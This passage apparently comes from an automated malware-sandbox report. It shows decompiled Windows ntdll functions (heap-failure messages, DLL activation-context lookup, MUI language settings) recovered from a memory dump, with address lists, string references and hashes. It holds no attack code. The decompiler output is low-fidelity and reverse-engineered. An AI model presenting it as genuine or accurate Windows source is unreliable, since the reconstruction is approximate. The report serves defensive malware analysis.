				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0119B150();
					} else {
						E0119B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x12858b4);
					E0119B150("Last known valid blocks: before - %p, after - %p\n",  *0x12858b0);
				} else {
					_t120 =  *0x12858b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0119B150();
				} else {
					E0119B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0119B150("Stack trace available at %p\n", 0x12858c0);
			}











                                                                                        0x01251c10
                                                                                        0x01251c16
                                                                                        0x01251c1e
                                                                                        0x01251c3d
                                                                                        0x01251c3e
                                                                                        0x01251c20
                                                                                        0x01251c35
                                                                                        0x01251c3a
                                                                                        0x01251c44
                                                                                        0x01251c55
                                                                                        0x01251c5a
                                                                                        0x01251c65
                                                                                        0x01251c67
                                                                                        0x00000000
                                                                                        0x01251c6e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01251c67
                                                                                        0x01251cdc
                                                                                        0x01251ce5
                                                                                        0x01251d04
                                                                                        0x01251d05
                                                                                        0x01251ce7
                                                                                        0x01251cfc
                                                                                        0x01251d01
                                                                                        0x01251d0b
                                                                                        0x01251d17
                                                                                        0x01251d1f
                                                                                        0x01251d25
                                                                                        0x01251d30
                                                                                        0x01251d4f
                                                                                        0x01251d50
                                                                                        0x01251d32
                                                                                        0x01251d47
                                                                                        0x01251d4c
                                                                                        0x01251d61
                                                                                        0x01251d67
                                                                                        0x01251d68
                                                                                        0x01251d6e
                                                                                        0x01251d79
                                                                                        0x01251d98
                                                                                        0x01251d99
                                                                                        0x01251d7b
                                                                                        0x01251d90
                                                                                        0x01251d95
                                                                                        0x01251daa
                                                                                        0x01251db0
                                                                                        0x01251db1
                                                                                        0x01251db7
                                                                                        0x01251dc2
                                                                                        0x01251de1
                                                                                        0x01251de2
                                                                                        0x01251dc4
                                                                                        0x01251dd9
                                                                                        0x01251dde
                                                                                        0x01251df3
                                                                                        0x01251df9
                                                                                        0x01251dfa
                                                                                        0x01251e00
                                                                                        0x01251e0a
                                                                                        0x01251e13
                                                                                        0x01251e32
                                                                                        0x01251e33
                                                                                        0x01251e15
                                                                                        0x01251e2a
                                                                                        0x01251e2f
                                                                                        0x01251e39
                                                                                        0x01251e4a
                                                                                        0x01251e02
                                                                                        0x01251e02
                                                                                        0x01251e08
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01251e08
                                                                                        0x01251e5b
                                                                                        0x01251e7a
                                                                                        0x01251e7b
                                                                                        0x01251e5d
                                                                                        0x01251e72
                                                                                        0x01251e77
                                                                                        0x01251e95

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                        • API String ID: 0-2897834094
                                                                                        • Opcode ID: 380ea53f231d4ce24cf7e6dba54e98cbdd48187202f98feda97d9284a3faa635
                                                                                        • Instruction ID: 9b51c3279a165bfe7f579de91ae0326cddc7a8699479d53303ce2f87780e531f
                                                                                        • Opcode Fuzzy Hash: 380ea53f231d4ce24cf7e6dba54e98cbdd48187202f98feda97d9284a3faa635
                                                                                        • Instruction Fuzzy Hash: 9A61E036536186DFD759BB89F4CAF2473A4EB00925B0DC03AF9096B310D7B498A08F1A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C8E00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126timeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 44%
                                                                                        			E011C8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x128d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1288464; // 0x74720110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1285780 & 0x00000003) != 0) {
							E01215510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1285780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E011DB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1287984; // 0xbc2be8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1288464; // 0x74720110
					 *0x128b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E011C9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1285780 & 0x00000005) != 0) {
						_push(_t49);
						E01215510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                        0x011c8e0f
                                                                                        0x011c8e16
                                                                                        0x011c8e19
                                                                                        0x011c8e1b
                                                                                        0x011c8e21
                                                                                        0x011c8e7f
                                                                                        0x011c8e85
                                                                                        0x01209354
                                                                                        0x0120936c
                                                                                        0x01209371
                                                                                        0x0120937b
                                                                                        0x01209381
                                                                                        0x01209381
                                                                                        0x0120937b
                                                                                        0x011c8e9d
                                                                                        0x011c8e9d
                                                                                        0x011c8e29
                                                                                        0x011c8e2c
                                                                                        0x011c8e38
                                                                                        0x011c8e3e
                                                                                        0x011c8e43
                                                                                        0x011c8eb5
                                                                                        0x011c8eb9
                                                                                        0x012092aa
                                                                                        0x012092af
                                                                                        0x012092e8
                                                                                        0x012092e8
                                                                                        0x012092af
                                                                                        0x011c8eb9
                                                                                        0x011c8e45
                                                                                        0x011c8e53
                                                                                        0x011c8e5b
                                                                                        0x011c8e5f
                                                                                        0x011c8e78
                                                                                        0x011c8e78
                                                                                        0x011c8e7d
                                                                                        0x011c8ec3
                                                                                        0x011c8ecd
                                                                                        0x011c8ed2
                                                                                        0x011c8ed2
                                                                                        0x011c8ec5
                                                                                        0x011c8ec5
                                                                                        0x00000000
                                                                                        0x011c8e7d
                                                                                        0x011c8e67
                                                                                        0x011c8ea4
                                                                                        0x0120931a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01209320
                                                                                        0x011c8ea4
                                                                                        0x011c8e70
                                                                                        0x01209325
                                                                                        0x01209340
                                                                                        0x01209345
                                                                                        0x01209345
                                                                                        0x011c8e76
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Strings
                                                                                        • LdrpFindDllActivationContext, xrefs: 01209331, 0120935D
                                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0120932A
                                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 01209357
                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 0120933B, 01209367
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                        • API String ID: 3446177414-3779518884
                                                                                        • Opcode ID: 06485740733d69d268f12d9a7b82dd34917511d52044361e821f88e77d06b13b
                                                                                        • Instruction ID: ea025eabaf59e8b9c033e662e00c4d41e3a9c6958ee4562e8152b3909000530f
                                                                                        • Opcode Fuzzy Hash: 06485740733d69d268f12d9a7b82dd34917511d52044361e821f88e77d06b13b
                                                                                        • Instruction Fuzzy Hash: 1941F932A003359FEB3EAB5C98CDB7977B5AB61A48F06416DE50557192E7706C80CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011A3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 96%
                                                                                        			E011A3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E011A1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E011A1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E011A1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E011A1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E011A1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L011B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E011DF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E011E1370(_t276, 0x1174e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E011DBB40(0,  &_v68, _t170);
									if(L011A43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E011DBB40(_t257,  &_v68, _t243);
								if(L011A43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E011E1370(_t278, 0x1174e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L011B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E011DF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E011E1370(_v16, 0x1174e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E011DBB40(_t262,  &_v68, _t244);
								if(L011A43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E011E1370(_t282, 0x1174e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E011DBB40(_t262,  &_v68, _t201);
							if(L011A43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L011B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E011DF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E011E1370(_t280, 0x1174e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E011DBB40(_t267,  &_v68, _t245);
							if(L011A43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E011E1370(_t284, 0x1174e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E011DBB40(_t267,  &_v68, _t224);
						if(L011A43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                        0x011a3d3c
                                                                                        0x011a3d42
                                                                                        0x011a3d44
                                                                                        0x011a3d46
                                                                                        0x011a3d49
                                                                                        0x011a3d4c
                                                                                        0x011a3d4f
                                                                                        0x011a3d52
                                                                                        0x011a3d55
                                                                                        0x011a3d58
                                                                                        0x011a3d5b
                                                                                        0x011a3d5f
                                                                                        0x011a3d61
                                                                                        0x011a3d66
                                                                                        0x011f8213
                                                                                        0x011f8218
                                                                                        0x011a4085
                                                                                        0x011a4088
                                                                                        0x011a408e
                                                                                        0x011a4094
                                                                                        0x011a409a
                                                                                        0x011a40a0
                                                                                        0x011a40a6
                                                                                        0x011a40a9
                                                                                        0x011a40af
                                                                                        0x011a40b6
                                                                                        0x011a40bd
                                                                                        0x011a40bd
                                                                                        0x011a3d83
                                                                                        0x011f821f
                                                                                        0x011f8229
                                                                                        0x011f8238
                                                                                        0x011f8238
                                                                                        0x011f823d
                                                                                        0x011f823d
                                                                                        0x011a3da0
                                                                                        0x011a3daf
                                                                                        0x011a3db5
                                                                                        0x011a3dba
                                                                                        0x011a3dba
                                                                                        0x011a3dd4
                                                                                        0x011a3e94
                                                                                        0x011a3eab
                                                                                        0x011a3f6d
                                                                                        0x011a3f84
                                                                                        0x011a406b
                                                                                        0x011a406b
                                                                                        0x011a406e
                                                                                        0x011a406e
                                                                                        0x011a4070
                                                                                        0x011a4074
                                                                                        0x011f8351
                                                                                        0x011f8351
                                                                                        0x011a407a
                                                                                        0x011a407f
                                                                                        0x011f835d
                                                                                        0x011f8370
                                                                                        0x011f8377
                                                                                        0x011f8379
                                                                                        0x011f837c
                                                                                        0x011f837c
                                                                                        0x011f835d
                                                                                        0x00000000
                                                                                        0x011a407f
                                                                                        0x011a3f8a
                                                                                        0x011a3f8d
                                                                                        0x011a3f90
                                                                                        0x011a3f95
                                                                                        0x011f830d
                                                                                        0x011f830f
                                                                                        0x011a3f9b
                                                                                        0x011a3fac
                                                                                        0x011a3fae
                                                                                        0x011a3fb1
                                                                                        0x011a3fb1
                                                                                        0x011a3fb6
                                                                                        0x011f8317
                                                                                        0x011f831a
                                                                                        0x00000000
                                                                                        0x011a3fbc
                                                                                        0x011a3fc1
                                                                                        0x011a3fc9
                                                                                        0x011a3fd7
                                                                                        0x011a3fda
                                                                                        0x011a3fdd
                                                                                        0x011a4021
                                                                                        0x011a4021
                                                                                        0x011a4029
                                                                                        0x011a4030
                                                                                        0x011a4044
                                                                                        0x011a4046
                                                                                        0x011a4046
                                                                                        0x011a4044
                                                                                        0x011a4049
                                                                                        0x011f8327
                                                                                        0x011f8334
                                                                                        0x011f8339
                                                                                        0x011f833c
                                                                                        0x011a404f
                                                                                        0x011a404f
                                                                                        0x011a404f
                                                                                        0x011a4051
                                                                                        0x011a4056
                                                                                        0x011a4063
                                                                                        0x011a4063
                                                                                        0x011a4068
                                                                                        0x00000000
                                                                                        0x011a4068
                                                                                        0x011a3fdf
                                                                                        0x011a3fe2
                                                                                        0x011a3fe4
                                                                                        0x011a3fe7
                                                                                        0x011a3fef
                                                                                        0x011a4003
                                                                                        0x011a4005
                                                                                        0x011a4005
                                                                                        0x011a400c
                                                                                        0x011a4013
                                                                                        0x011a4016
                                                                                        0x011a4017
                                                                                        0x011a401b
                                                                                        0x011a401e
                                                                                        0x00000000
                                                                                        0x011a401e
                                                                                        0x011a3fb6
                                                                                        0x011a3eb1
                                                                                        0x011a3eb4
                                                                                        0x011a3eb7
                                                                                        0x011a3ebc
                                                                                        0x011f82a9
                                                                                        0x011f82ab
                                                                                        0x011a3ec2
                                                                                        0x011a3ed3
                                                                                        0x011a3ed5
                                                                                        0x011a3ed8
                                                                                        0x011a3ed8
                                                                                        0x011a3edd
                                                                                        0x011f82b3
                                                                                        0x011f82b6
                                                                                        0x00000000
                                                                                        0x011a3ee3
                                                                                        0x011a3ee8
                                                                                        0x011a3eed
                                                                                        0x011a3ef0
                                                                                        0x011a3ef3
                                                                                        0x011a3f02
                                                                                        0x011a3f05
                                                                                        0x011a3f08
                                                                                        0x011f82c0
                                                                                        0x011f82c3
                                                                                        0x011f82c5
                                                                                        0x011f82c8
                                                                                        0x011f82d0
                                                                                        0x011f82e4
                                                                                        0x011f82e6
                                                                                        0x011f82e6
                                                                                        0x011f82ed
                                                                                        0x011f82f4
                                                                                        0x011f82f7
                                                                                        0x011f82f8
                                                                                        0x011f82fc
                                                                                        0x011f82ff
                                                                                        0x011f82ff
                                                                                        0x011a3f0e
                                                                                        0x011a3f11
                                                                                        0x011a3f16
                                                                                        0x011a3f1d
                                                                                        0x011a3f31
                                                                                        0x011f8307
                                                                                        0x011f8307
                                                                                        0x011a3f31
                                                                                        0x011a3f39
                                                                                        0x011a3f48
                                                                                        0x011a3f4d
                                                                                        0x011a3f50
                                                                                        0x011a3f50
                                                                                        0x011a3f53
                                                                                        0x011a3f58
                                                                                        0x011a3f65
                                                                                        0x011a3f65
                                                                                        0x011a3f6a
                                                                                        0x00000000
                                                                                        0x011a3f6a
                                                                                        0x011a3edd
                                                                                        0x011a3dda
                                                                                        0x011a3ddd
                                                                                        0x011a3de0
                                                                                        0x011a3de5
                                                                                        0x011f8245
                                                                                        0x011a3deb
                                                                                        0x011a3df7
                                                                                        0x011a3dfc
                                                                                        0x011a3dfe
                                                                                        0x011a3e01
                                                                                        0x011a3e01
                                                                                        0x011a3e06
                                                                                        0x011f824d
                                                                                        0x011f824f
                                                                                        0x011f8254
                                                                                        0x00000000
                                                                                        0x011a3e0c
                                                                                        0x011a3e11
                                                                                        0x011a3e16
                                                                                        0x011a3e19
                                                                                        0x011a3e29
                                                                                        0x011a3e2c
                                                                                        0x011a3e2f
                                                                                        0x011f825c
                                                                                        0x011f825f
                                                                                        0x011f8261
                                                                                        0x011f8264
                                                                                        0x011f826c
                                                                                        0x011f8280
                                                                                        0x011f8282
                                                                                        0x011f8282
                                                                                        0x011f8289
                                                                                        0x011f8290
                                                                                        0x011f8293
                                                                                        0x011f8294
                                                                                        0x011f8298
                                                                                        0x011f829b
                                                                                        0x011f829b
                                                                                        0x011a3e35
                                                                                        0x011a3e38
                                                                                        0x011a3e3d
                                                                                        0x011a3e44
                                                                                        0x011a3e58
                                                                                        0x011f82a3
                                                                                        0x011f82a3
                                                                                        0x011a3e58
                                                                                        0x011a3e60
                                                                                        0x011a3e6f
                                                                                        0x011a3e74
                                                                                        0x011a3e77
                                                                                        0x011a3e77
                                                                                        0x011a3e7a
                                                                                        0x011a3e7f
                                                                                        0x011a3e8c
                                                                                        0x011a3e8c
                                                                                        0x011a3e91
                                                                                        0x00000000
                                                                                        0x011a3e91

                                                                                        Strings
                                                                                        • WindowsExcludedProcs, xrefs: 011A3D6F
                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 011A3DC0
                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 011A3E97
                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 011A3D8C
                                                                                        • Kernel-MUI-Language-SKU, xrefs: 011A3F70
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                        • API String ID: 0-258546922
                                                                                        • Opcode ID: 432f7a227e63a6d2597376cd51b555ec0e803a8becfcbcf869d03a0e3a9e1697
                                                                                        • Instruction ID: 0ef6ab86faf5481c39d6b98051a43b8ad7d7e469f53eb0e98e9e0c5ce3b1dd9f
                                                                                        • Opcode Fuzzy Hash: 432f7a227e63a6d2597376cd51b555ec0e803a8becfcbcf869d03a0e3a9e1697
                                                                                        • Instruction Fuzzy Hash: 1BF19F76D10619EFCB19DFD8C980AEEBBB8FF48650F15006AE905E7650E7749E01CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011A8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 83%
                                                                                        			E011A8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E011A934A() != 0) {
								_t159 = E0121A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1285780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
